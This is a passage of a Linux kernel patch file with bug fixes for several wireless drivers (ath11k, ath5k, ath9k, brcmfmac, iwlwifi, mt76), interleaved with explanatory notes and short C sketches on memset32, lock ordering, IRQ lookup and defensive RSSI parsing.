++++ b/drivers/net/wireless/ath/ath11k/dbring.c
+@@ -26,13 +26,13 @@ int ath11k_dbring_validate_buffer(struct ath11k *ar, void *buffer, u32 size)
+ static void ath11k_dbring_fill_magic_value(struct ath11k *ar,
+ 					   void *buffer, u32 size)
+ {
+-	u32 *temp;
+-	int idx;
+-
+-	size = size >> 2;
++	/* memset32() fills the buffer payload with ATH11K_DB_MAGIC_VALUE;
++	 * its size argument is the number of u32 values to store,
++	 * not the number of bytes.
++	 */
++	size = size / sizeof(u32);
+ 
+-	for (idx = 0, temp = buffer; idx < size; idx++, temp++)
+-		*temp++ = ATH11K_DB_MAGIC_VALUE;
++	memset32(buffer, ATH11K_DB_MAGIC_VALUE, size);
+ }
+ 
+ static int ath11k_dbring_bufs_replenish(struct ath11k *ar,
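
Besides being shorter, the memset32() form fixes a real bug: the old loop advanced
temp both in the for-clause and via *temp++, so it filled only every other word and
wrote past the end of the buffer. A sketch of the replacement, byte count in, word
count out:

#include <linux/string.h>
#include <linux/types.h>

#define DEMO_MAGIC	0xdeadbeef

static void demo_fill_magic(void *buffer, u32 size_bytes)
{
	/* memset32() takes the number of 32-bit values, not bytes. */
	memset32(buffer, DEMO_MAGIC, size_bytes / sizeof(u32));
}
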
+diff --git a/drivers/net/wireless/ath/ath11k/mac.h b/drivers/net/wireless/ath/ath11k/mac.h
+index 2a0d3afb0c993..0231783ad754b 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.h
++++ b/drivers/net/wireless/ath/ath11k/mac.h
+@@ -163,7 +163,7 @@ void ath11k_mac_drain_tx(struct ath11k *ar);
+ void ath11k_mac_peer_cleanup_all(struct ath11k *ar);
+ int ath11k_mac_tx_mgmt_pending_free(int buf_id, void *skb, void *ctx);
+ u8 ath11k_mac_bw_to_mac80211_bw(u8 bw);
+-u32 ath11k_mac_he_gi_to_nl80211_he_gi(u8 sgi);
++enum nl80211_he_gi ath11k_mac_he_gi_to_nl80211_he_gi(u8 sgi);
+ enum nl80211_he_ru_alloc ath11k_mac_phy_he_ru_to_nl80211_he_ru_alloc(u16 ru_phy);
+ enum nl80211_he_ru_alloc ath11k_mac_he_ru_tones_to_nl80211_he_ru_alloc(u16 ru_tones);
+ enum ath11k_supported_bw ath11k_mac_mac80211_bw_to_ath11k_bw(enum rate_info_bw bw);
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index 86995e8dc9135..a62ee05c54097 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -16,7 +16,7 @@
+ #include "pci.h"
+ #include "pcic.h"
+ 
+-#define MHI_TIMEOUT_DEFAULT_MS	90000
++#define MHI_TIMEOUT_DEFAULT_MS	20000
+ #define RDDM_DUMP_SIZE	0x420000
+ 
+ static struct mhi_channel_config ath11k_mhi_channels_qca6390[] = {
+diff --git a/drivers/net/wireless/ath/ath11k/peer.c b/drivers/net/wireless/ath/ath11k/peer.c
+index 1ae7af02c364e..1380811827a84 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.c
++++ b/drivers/net/wireless/ath/ath11k/peer.c
+@@ -382,22 +382,23 @@ int ath11k_peer_create(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		return -ENOBUFS;
+ 	}
+ 
++	mutex_lock(&ar->ab->tbl_mtx_lock);
+ 	spin_lock_bh(&ar->ab->base_lock);
+ 	peer = ath11k_peer_find_by_addr(ar->ab, param->peer_addr);
+ 	if (peer) {
+ 		if (peer->vdev_id == param->vdev_id) {
+ 			spin_unlock_bh(&ar->ab->base_lock);
++			mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* Assume sta is transitioning to another band.
+ 		 * Remove the peer from the rhash table here.
+ 		 */
+-		mutex_lock(&ar->ab->tbl_mtx_lock);
+ 		ath11k_peer_rhash_delete(ar->ab, peer);
+-		mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 	}
+ 	spin_unlock_bh(&ar->ab->base_lock);
++	mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 
+ 	ret = ath11k_wmi_send_peer_create_cmd(ar, param);
+ 	if (ret) {
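
The peer-creation fix above widens the tbl_mtx_lock critical section so the mutex is
always acquired before base_lock and never after it; holding to a single global
acquisition order between two locks is what rules out an ABBA deadlock with the
other rhash users. The discipline in isolation (names here are illustrative):

#include <linux/mutex.h>
#include <linux/spinlock.h>

static DEFINE_MUTEX(demo_tbl_mtx);		/* outer lock, may sleep */
static DEFINE_SPINLOCK(demo_base_lock);		/* inner lock, atomic */

static void demo_update_tables(void)
{
	mutex_lock(&demo_tbl_mtx);		/* always taken first */
	spin_lock_bh(&demo_base_lock);		/* always taken second */

	/* ... look up the peer and update both tables consistently ... */

	spin_unlock_bh(&demo_base_lock);
	mutex_unlock(&demo_tbl_mtx);
}
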
+diff --git a/drivers/net/wireless/ath/ath5k/ahb.c b/drivers/net/wireless/ath/ath5k/ahb.c
+index 2c9cec8b53d9e..28a1e5eff204e 100644
+--- a/drivers/net/wireless/ath/ath5k/ahb.c
++++ b/drivers/net/wireless/ath/ath5k/ahb.c
+@@ -113,15 +113,13 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 		goto err_out;
+ 	}
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+-	if (res == NULL) {
+-		dev_err(&pdev->dev, "no IRQ resource found\n");
+-		ret = -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0) {
++		dev_err(&pdev->dev, "no IRQ resource found: %d\n", irq);
++		ret = irq;
+ 		goto err_iounmap;
+ 	}
+ 
+-	irq = res->start;
+-
+ 	hw = ieee80211_alloc_hw(sizeof(struct ath5k_hw), &ath5k_hw_ops);
+ 	if (hw == NULL) {
+ 		dev_err(&pdev->dev, "no memory for ieee80211_hw\n");
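
The ath5k probe change uses the same idiom as the ath11k MSI hunk further up:
platform_get_irq() already returns either a usable IRQ number or a negative errno,
so the IORESOURCE_IRQ lookup and the invented -ENXIO both go away. Roughly:

#include <linux/platform_device.h>

static int demo_probe(struct platform_device *pdev)
{
	int irq;

	irq = platform_get_irq(pdev, 0);
	if (irq < 0)
		return irq;	/* propagate the errno, e.g. -EPROBE_DEFER */

	/* ... devm_request_irq(&pdev->dev, irq, ...) and the rest ... */
	return 0;
}
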
+diff --git a/drivers/net/wireless/ath/ath5k/eeprom.c b/drivers/net/wireless/ath/ath5k/eeprom.c
+index d444b3d70ba2e..58d3e86f6256d 100644
+--- a/drivers/net/wireless/ath/ath5k/eeprom.c
++++ b/drivers/net/wireless/ath/ath5k/eeprom.c
+@@ -529,7 +529,7 @@ ath5k_eeprom_read_freq_list(struct ath5k_hw *ah, int *offset, int max,
+ 		ee->ee_n_piers[mode]++;
+ 
+ 		freq2 = (val >> 8) & 0xff;
+-		if (!freq2)
++		if (!freq2 || i >= max)
+ 			break;
+ 
+ 		pc[i++].freq = ath5k_eeprom_bin2freq(ee,
+diff --git a/drivers/net/wireless/ath/ath6kl/bmi.c b/drivers/net/wireless/ath/ath6kl/bmi.c
+index bde5a10d470c8..af98e871199d3 100644
+--- a/drivers/net/wireless/ath/ath6kl/bmi.c
++++ b/drivers/net/wireless/ath/ath6kl/bmi.c
+@@ -246,7 +246,7 @@ int ath6kl_bmi_execute(struct ath6kl *ar, u32 addr, u32 *param)
+ 		return -EACCES;
+ 	}
+ 
+-	size = sizeof(cid) + sizeof(addr) + sizeof(param);
++	size = sizeof(cid) + sizeof(addr) + sizeof(*param);
+ 	if (size > ar->bmi.max_cmd_size) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
+diff --git a/drivers/net/wireless/ath/ath6kl/htc_pipe.c b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+index c68848819a52d..9b88d96bfe96c 100644
+--- a/drivers/net/wireless/ath/ath6kl/htc_pipe.c
++++ b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+@@ -960,8 +960,8 @@ static int ath6kl_htc_pipe_rx_complete(struct ath6kl *ar, struct sk_buff *skb,
+ 	 * Thus the possibility of ar->htc_target being NULL
+ 	 * via ath6kl_recv_complete -> ath6kl_usb_io_comp_work.
+ 	 */
+-	if (WARN_ON_ONCE(!target)) {
+-		ath6kl_err("Target not yet initialized\n");
++	if (!target) {
++		ath6kl_dbg(ATH6KL_DBG_HTC, "Target not yet initialized\n");
+ 		status = -EINVAL;
+ 		goto free_skb;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index f521dfa2f1945..e0130beb304df 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -534,6 +534,24 @@ static struct ath9k_htc_hif hif_usb = {
+ 	.send = hif_usb_send,
+ };
+ 
++/* Free the remain_skb allocated in ath9k_hif_usb_rx_stream() in case
++ * ath9k_hif_usb_rx_stream() is never called again to process the
++ * buffer and subsequently free it.
++ */
++static void ath9k_hif_usb_free_rx_remain_skb(struct hif_device_usb *hif_dev)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&hif_dev->rx_lock, flags);
++	if (hif_dev->remain_skb) {
++		dev_kfree_skb_any(hif_dev->remain_skb);
++		hif_dev->remain_skb = NULL;
++		hif_dev->rx_remain_len = 0;
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	spin_unlock_irqrestore(&hif_dev->rx_lock, flags);
++}
++
+ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				    struct sk_buff *skb)
+ {
+@@ -868,6 +886,7 @@ err:
+ static void ath9k_hif_usb_dealloc_rx_urbs(struct hif_device_usb *hif_dev)
+ {
+ 	usb_kill_anchored_urbs(&hif_dev->rx_submitted);
++	ath9k_hif_usb_free_rx_remain_skb(hif_dev);
+ }
+ 
+ static int ath9k_hif_usb_alloc_rx_urbs(struct hif_device_usb *hif_dev)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index 12c4408bbc3b6..2cc913acfc2d7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6210,18 +6210,20 @@ static s32 brcmf_notify_rssi(struct brcmf_if *ifp,
+ {
+ 	struct brcmf_cfg80211_vif *vif = ifp->vif;
+ 	struct brcmf_rssi_be *info = data;
+-	s32 rssi, snr, noise;
++	s32 rssi, snr = 0, noise = 0;
+ 	s32 low, high, last;
+ 
+-	if (e->datalen < sizeof(*info)) {
++	if (e->datalen >= sizeof(*info)) {
++		rssi = be32_to_cpu(info->rssi);
++		snr = be32_to_cpu(info->snr);
++		noise = be32_to_cpu(info->noise);
++	} else if (e->datalen >= sizeof(rssi)) {
++		rssi = be32_to_cpu(*(__be32 *)data);
++	} else {
+ 		brcmf_err("insufficient RSSI event data\n");
+ 		return 0;
+ 	}
+ 
+-	rssi = be32_to_cpu(info->rssi);
+-	snr = be32_to_cpu(info->snr);
+-	noise = be32_to_cpu(info->noise);
+-
+ 	low = vif->cqm_rssi_low;
+ 	high = vif->cqm_rssi_high;
+ 	last = vif->cqm_rssi_last;
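
The brcmfmac change converts a hard failure on short RSSI events into graceful
degradation: a payload covering the whole struct yields RSSI, SNR and noise, while
one that only covers a single __be32 still yields RSSI. The defensive shape,
sketched with a hypothetical event layout:

#include <linux/errno.h>
#include <linux/types.h>
#include <asm/byteorder.h>

struct demo_rssi_be {			/* hypothetical big-endian payload */
	__be32 rssi;
	__be32 snr;
	__be32 noise;
};

static int demo_parse_rssi(const void *data, size_t datalen, s32 *rssi)
{
	const struct demo_rssi_be *info = data;

	if (datalen >= sizeof(*info))		/* full event */
		*rssi = be32_to_cpu(info->rssi);
	else if (datalen >= sizeof(__be32))	/* short legacy event */
		*rssi = be32_to_cpu(*(const __be32 *)data);
	else
		return -EINVAL;			/* too short to trust */

	return 0;
}
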
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index abf49022edbe4..027360e63b926 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1038,7 +1038,7 @@ iwl_dump_ini_prph_mac_iter(struct iwl_fw_runtime *fwrt,
+ 	range->range_data_size = reg->dev_addr.size;
+ 	for (i = 0; i < le32_to_cpu(reg->dev_addr.size); i += 4) {
+ 		prph_val = iwl_read_prph(fwrt->trans, addr + i);
+-		if (prph_val == 0x5a5a5a5a)
++		if ((prph_val & ~0xf) == 0xa5a5a5a0)
+ 			return -EBUSY;
+ 		*val++ = cpu_to_le32(prph_val);
+ 	}
+@@ -1388,13 +1388,13 @@ static void iwl_ini_get_rxf_data(struct iwl_fw_runtime *fwrt,
+ 	if (!data)
+ 		return;
+ 
++	memset(data, 0, sizeof(*data));
++
+ 	/* make sure only one bit is set in only one fid */
+ 	if (WARN_ONCE(hweight_long(fid1) + hweight_long(fid2) != 1,
+ 		      "fid1=%x, fid2=%x\n", fid1, fid2))
+ 		return;
+ 
+-	memset(data, 0, sizeof(*data));
+-
+ 	if (fid1) {
+ 		fifo_idx = ffs(fid1) - 1;
+ 		if (WARN_ONCE(fifo_idx >= MAX_NUM_LMAC, "fifo_idx=%d\n",
+@@ -1562,7 +1562,7 @@ iwl_dump_ini_dbgi_sram_iter(struct iwl_fw_runtime *fwrt,
+ 		prph_data = iwl_read_prph_no_grab(fwrt->trans, (i % 2) ?
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_MSB :
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_LSB);
+-		if (prph_data == 0x5a5a5a5a) {
++		if ((prph_data & ~0xf) == 0xa5a5a5a0) {
+ 			iwl_trans_release_nic_access(fwrt->trans);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 43e997283db0f..607e07ed2477c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -317,8 +317,10 @@ static void *iwl_dbgfs_fw_info_seq_next(struct seq_file *seq,
+ 	const struct iwl_fw *fw = priv->fwrt->fw;
+ 
+ 	*pos = ++state->pos;
+-	if (*pos >= fw->ucode_capa.n_cmd_versions)
++	if (*pos >= fw->ucode_capa.n_cmd_versions) {
++		kfree(state);
+ 		return NULL;
++	}
+ 
+ 	return state;
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 3237d4b528b5d..a1d34f3e7a9f4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -138,6 +138,12 @@ static int iwl_dbg_tlv_alloc_buf_alloc(struct iwl_trans *trans,
+ 	    alloc_id != IWL_FW_INI_ALLOCATION_ID_DBGC1)
+ 		goto err;
+ 
++	if (buf_location == IWL_FW_INI_LOCATION_DRAM_PATH &&
++	    alloc->req_size == 0) {
++		IWL_ERR(trans, "WRT: Invalid DRAM buffer allocation requested size (0)\n");
++		return -EINVAL;
++	}
++
+ 	trans->dbg.fw_mon_cfg[alloc_id] = *alloc;
+ 
+ 	return 0;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+index ae4c2a3d63d5b..3a3c13a41fc61 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2005-2011, 2021 Intel Corporation
++ * Copyright (C) 2005-2011, 2021-2022 Intel Corporation
+  */
+ #include <linux/device.h>
+ #include <linux/interrupt.h>
+@@ -57,6 +57,7 @@ void __iwl_err(struct device *dev, enum iwl_err_mode mode, const char *fmt, ...)
+ 	default:
+ 		break;
+ 	}
++	vaf.va = &args;
+ 	trace_iwlwifi_err(&vaf);
+ 	va_end(args);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 919b1f478b4ce..bbdda3e1ff3fc 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -563,6 +563,7 @@ static void iwl_mvm_wowlan_get_tkip_data(struct ieee80211_hw *hw,
+ 		}
+ 
+ 		for (i = 0; i < IWL_NUM_RSC; i++) {
++			ieee80211_get_key_rx_seq(key, i, &seq);
+ 			/* wrapping isn't allowed, AP must rekey */
+ 			if (seq.tkip.iv32 > cur_rx_iv32)
+ 				cur_rx_iv32 = seq.tkip.iv32;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+index 1e8123140973e..022ec7ec0a2f1 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+@@ -1745,6 +1745,11 @@ static ssize_t iwl_dbgfs_mem_read(struct file *file, char __user *user_buf,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (le32_to_cpu(rsp->status) != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+@@ -1821,6 +1826,11 @@ static ssize_t iwl_dbgfs_mem_write(struct file *file,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (rsp->status != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+index 49ca1e168fc5b..eee98cebbb46a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+@@ -384,9 +384,10 @@ void iwl_mvm_rx_rx_mpdu(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 		 * Don't even try to decrypt a MCAST frame that was received
+ 		 * before the managed vif is authorized, we'd fail anyway.
+ 		 */
+-		if (vif->type == NL80211_IFTYPE_STATION &&
++		if (is_multicast_ether_addr(hdr->addr1) &&
++		    vif->type == NL80211_IFTYPE_STATION &&
+ 		    !mvmvif->authorized &&
+-		    is_multicast_ether_addr(hdr->addr1)) {
++		    ieee80211_has_protected(hdr->frame_control)) {
+ 			IWL_DEBUG_DROP(mvm, "MCAST before the vif is authorized\n");
+ 			kfree_skb(skb);
+ 			rcu_read_unlock();
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 1aadccd8841fd..091225894037c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -193,8 +193,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	 * Starting from Bz hardware, it calculates starting directly after
+ 	 * the MAC header, so that matches mac80211's expectation.
+ 	 */
+-	if (skb->ip_summed == CHECKSUM_COMPLETE &&
+-	    mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ) {
++	if (skb->ip_summed == CHECKSUM_COMPLETE) {
+ 		struct {
+ 			u8 hdr[6];
+ 			__be16 type;
+@@ -209,7 +208,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			      shdr->type != htons(ETH_P_PAE) &&
+ 			      shdr->type != htons(ETH_P_TDLS))))
+ 			skb->ip_summed = CHECKSUM_NONE;
+-		else
++		else if (mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ)
+ 			/* mac80211 assumes full CSUM including SNAP header */
+ 			skb_postpush_rcsum(skb, shdr, sizeof(*shdr));
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 4f699862e7f73..85fadd1ef1ff3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -565,7 +565,6 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x43F0, 0x1652, killer1650i_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650i_name),
+ 	IWL_DEV_INFO(0x43F0, 0x2074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0x43F0, 0x4070, iwl_ax201_cfg_qu_hr, NULL),
+-	IWL_DEV_INFO(0x43F0, 0x1651, killer1650s_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650s_name),
+ 	IWL_DEV_INFO(0xA0F0, 0x0070, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0078, iwl_ax201_cfg_qu_hr, NULL),
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index bd50f52a1aade..54f11f60f11c4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -599,7 +599,6 @@ static int iwl_pcie_set_hw_ready(struct iwl_trans *trans)
+ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ {
+ 	int ret;
+-	int t = 0;
+ 	int iter;
+ 
+ 	IWL_DEBUG_INFO(trans, "iwl_trans_prepare_card_hw enter\n");
+@@ -616,6 +615,8 @@ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ 	usleep_range(1000, 2000);
+ 
+ 	for (iter = 0; iter < 10; iter++) {
++		int t = 0;
++
+ 		/* If HW is not ready, prepare the conditions to check again */
+ 		iwl_set_bit(trans, CSR_HW_IF_CONFIG_REG,
+ 			    CSR_HW_IF_CONFIG_REG_PREPARE);
+@@ -1522,19 +1523,16 @@ static int iwl_pcie_d3_handshake(struct iwl_trans *trans, bool suspend)
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	int ret;
+ 
+-	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210) {
++	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210)
+ 		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+ 				    suspend ? UREG_DOORBELL_TO_ISR6_SUSPEND :
+ 					      UREG_DOORBELL_TO_ISR6_RESUME);
+-	} else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ) {
++	else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
+ 		iwl_write32(trans, CSR_IPC_SLEEP_CONTROL,
+ 			    suspend ? CSR_IPC_SLEEP_CONTROL_SUSPEND :
+ 				      CSR_IPC_SLEEP_CONTROL_RESUME);
+-		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+-				    UREG_DOORBELL_TO_ISR6_SLEEP_CTRL);
+-	} else {
++	else
+ 		return 0;
+-	}
+ 
+ 	ret = wait_event_timeout(trans_pcie->sx_waitq,
+ 				 trans_pcie->sx_complete, 2 * HZ);
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 478bffb7418d9..c406cb1a102ff 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -436,7 +436,9 @@ free:
+ free_skb:
+ 	status.skb = tx_info.skb;
+ 	hw = mt76_tx_status_get_hw(dev, tx_info.skb);
++	spin_lock_bh(&dev->rx_lock);
+ 	ieee80211_tx_status_ext(hw, &status);
++	spin_unlock_bh(&dev->rx_lock);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 7bcf7a6b67df3..9c753c6aabeff 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -904,10 +904,11 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ 
+ #define mt76_poll(dev, ...) __mt76_poll(&((dev)->mt76), __VA_ARGS__)
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout);
+-
+-#define mt76_poll_msec(dev, ...) __mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int kick);
++#define __mt76_poll_msec(...)         ____mt76_poll_msec(__VA_ARGS__, 10)
++#define mt76_poll_msec(dev, ...)      ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__, 10)
++#define mt76_poll_msec_tick(dev, ...) ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
+ 
+ void mt76_mmio_init(struct mt76_dev *dev, void __iomem *regs);
+ void mt76_pci_disable_aspm(struct pci_dev *pdev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 49a511ae8161d..6cff346d57a78 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1279,8 +1279,11 @@ void mt7603_mac_add_txs(struct mt7603_dev *dev, void *data)
+ 	if (wcidx >= MT7603_WTBL_STA || !sta)
+ 		goto out;
+ 
+-	if (mt7603_fill_txs(dev, msta, &info, txs_data))
++	if (mt7603_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mt76_hw(dev), sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index a0412a29fb491..faed43b11ec93 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1517,8 +1517,11 @@ static void mt7615_mac_add_txs(struct mt7615_dev *dev, void *data)
+ 	if (wcid->phy_idx && dev->mt76.phys[MT_BAND1])
+ 		mphy = dev->mt76.phys[MT_BAND1];
+ 
+-	if (mt7615_fill_txs(dev, msta, &info, txs_data))
++	if (mt7615_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mphy->hw, sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+@@ -2340,7 +2343,7 @@ void mt7615_coredump_work(struct work_struct *work)
+ 			break;
+ 
+ 		skb_pull(skb, sizeof(struct mt7615_mcu_rxd));
+-		if (data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
++		if (!dump || data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
+ 			dev_kfree_skb(skb);
+ 			continue;
+ 		}
+@@ -2350,6 +2353,8 @@ void mt7615_coredump_work(struct work_struct *work)
+ 
+ 		dev_kfree_skb(skb);
+ 	}
+-	dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
+-		      GFP_KERNEL);
++
++	if (dump)
++		dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
++			      GFP_KERNEL);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 46ede1b72bbee..19f02b632a204 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -539,7 +539,8 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	if (txwi[2] & cpu_to_le32(MT_TXD2_FIX_RATE)) {
+ 		/* Fixed rate is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+-		bool multicast = is_multicast_ether_addr(hdr->addr1);
++		bool multicast = ieee80211_is_data(hdr->frame_control) &&
++				 is_multicast_ether_addr(hdr->addr1);
+ 		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
